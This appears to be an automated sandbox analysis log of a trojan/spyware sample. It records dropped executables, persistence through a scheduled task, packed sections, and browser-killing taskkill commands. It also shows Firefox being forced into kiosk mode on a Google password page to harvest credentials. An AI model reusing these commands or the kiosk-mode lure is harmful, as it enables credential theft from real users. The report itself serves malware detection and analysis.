00000019.00000002.3168467710.000001378E4B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E85E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3168685782.000001378E4D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2958094228.00000292F5761000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2963173748.00000249FBEE3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3168685782.000001378E4D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd_setSearchProviderIn
Source: 2d569de7b1.exe, 0000000C.00000002.2989049565.0000000000F40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdf_6.0.1
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountservices.sync.log.logger.browserPanelUI-remotetabs-setupsyncappMenu-heade
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:60559 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60565 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60568 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60573 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60639 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60640 version: TLS 1.2

System Summary

Source: 2d569de7b1.exe, 0000000C.00000000.2915915173.0000000000D62000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_60027c62-9
Source: 2d569de7b1.exe, 0000000C.00000000.2915915173.0000000000D62000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_83877f55-8
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: .idata
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .rsrc
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .idata
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name:
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .rsrc
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 976d9f40c1.exe.8.dr Static PE information: section name:
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .rsrc
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .rsrc
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .idata
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_00BBC056 5_2_00BBC056
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FEE530 8_2_00FEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01022D10 8_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_010231A8 8_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FE4DE0 8_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01027049 8_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01028860 8_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_010278BB 8_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01017F36 8_2_01017F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_0102779B 8_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FE4B30 8_2_00FE4B30
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994778774752475
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: Section: ZLIB complexity 0.9977275630108992
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: Section: ptpgbbgo ZLIB complexity 0.9942102758172363
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: Section: njaoxwad ZLIB complexity 0.9948439896472393
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9977275630108992
Source: skotes.exe.3.dr Static PE information: Section: ptpgbbgo ZLIB complexity 0.9942102758172363
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9994778774752475
Source: 976d9f40c1.exe.8.dr Static PE information: Section: ZLIB complexity 0.9994778774752475
Source: random[1].exe0.8.dr Static PE information: Section: njaoxwad ZLIB complexity 0.9948439896472393
Source: 606f2f6db0.exe.8.dr Static PE information: Section: njaoxwad ZLIB complexity 0.9948439896472393
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 606f2f6db0.exe.8.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.8.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2319704443.00000000002D1000.00000040.00000001.01000000.00000007.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000003.2279367623.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000003.2884674962.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2934932135.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@71/26@91/12
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_047B15D0 ChangeServiceConfigA, 5_2_047B15D0
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33ORRB19.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2108201890.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120732825.0000000005A93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: S14AV77TIR9DRWSCWIW0.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 7RNKVR1EZ552XQ73.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe "C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe "C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe "C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe"
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2184 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b40077cd-dd11-4133-b7ff-87ccb7cbcf33} 7456 "\\.\pipe\gecko-crash-server-pipe.7456" 1378e86ed10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2948 -parentBuildID 20230927232528 -prefsHandle 4268 -prefMapHandle 3212 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ae1ecd2-7e69-4001-87b4-63ef548d530a} 7456 "\\.\pipe\gecko-crash-server-pipe.7456" 1379e087210 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2140 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 26596 -prefMapSize 238335 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02f5810b-dd2b-4de0-96e0-9800a8c8aecc} 3780 "\\.\pipe\gecko-crash-server-pipe.3780" 1a0b0b6ff10 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe "C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe "C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
